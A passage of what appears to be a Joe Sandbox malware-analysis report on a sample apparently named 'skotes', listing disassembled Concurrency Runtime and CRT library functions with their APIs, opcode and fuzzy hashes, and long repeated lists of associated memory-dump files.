                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                                                                                                                          • String ID: e
                                                                                                                                                                                                                                          • API String ID: 1411586358-4024072794
                                                                                                                                                                                                                                          • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                          • Instruction ID: 886f0ac0044c9fb43c9a33f0c2c4f1395064b15a1b29c94f8b4239f1a270a46e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26119131200106ABDB55DE69C8A5FBA77A6EF02324B18C19EFD06DF202DB71D901CBA1
                                                                                                                                                                                                                                          Function 006AD029 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 006AD03B
                                                                                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 006AD069
                                                                                                                                                                                                                                          • kernel32.dll, xrefs: 006AD04C
                                                                                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 006AD05D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___scrt_fastfail
                                                                                                                                                                                                                                          • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 2964418898-3242537097
                                                                                                                                                                                                                                          • Opcode ID: 74582bad304c3a79328570c3543374fe419e0134483882443c07a7b778f25538
                                                                                                                                                                                                                                          • Instruction ID: 03e4ef009406d237c1c22d5448fb29284c330a34eb4451fbab7e4172e7705d2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74582bad304c3a79328570c3543374fe419e0134483882443c07a7b778f25538
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D0162A1B837116A9B313B765C0DEAB218B8B47B40F0A2511BE06EBA91EB60CC419D75
                                                                                                                                                                                                                                          Function 006BE8DD Relevance: 7.6, APIs: 5, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 006BE91E
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 006BE926
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 006BE950
                                                                                                                                                                                                                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 006BE959
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006BE9DC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 512098550-0
                                                                                                                                                                                                                                          • Opcode ID: a4b7dbe58ba24ee3624bcb0af459afc05ca5a26c728ca93ea7feb7efc3e2c5c5
                                                                                                                                                                                                                                          • Instruction ID: 61e433b69a738b9b0cbfb91e9969f5d326e1a41f3d33826016677bcd3ced4333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4b7dbe58ba24ee3624bcb0af459afc05ca5a26c728ca93ea7feb7efc3e2c5c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C416075A00219EFCB09EF64C494AEDB7B6FF48310F048159E506AB390CB74AE41CF81
                                                                                                                                                                                                                                          Function 006BD2B9 Relevance: 7.6, APIs: 5, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 006BD344
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006BD367
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 006BD370
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 006BD3A8
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 006BD3B3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4212520697-0
                                                                                                                                                                                                                                          • Opcode ID: b3ef916a54d99538d6be94e2334583ff7db62da73384d50489f0a0fde816dbd2
                                                                                                                                                                                                                                          • Instruction ID: 376bbc039e8bd6ea7b637b758d5d0eb2d033e7ffdad0687da7814987dc1c69d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3ef916a54d99538d6be94e2334583ff7db62da73384d50489f0a0fde816dbd2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB31A0B57006109FDB05EB54C885BEDB7E7AF89310F150199E9069F392EB70ED81CB92
                                                                                                                                                                                                                                          Function 006B86C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _SpinWait.LIBCONCRT ref: 006B86EE
                                                                                                                                                                                                                                            • Part of subcall function 006AEAD0: _SpinWait.LIBCONCRT ref: 006AEAE8
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 006B8702
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 006B8734
                                                                                                                                                                                                                                          • List.LIBCMT ref: 006B87B7
                                                                                                                                                                                                                                          • List.LIBCMT ref: 006B87C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
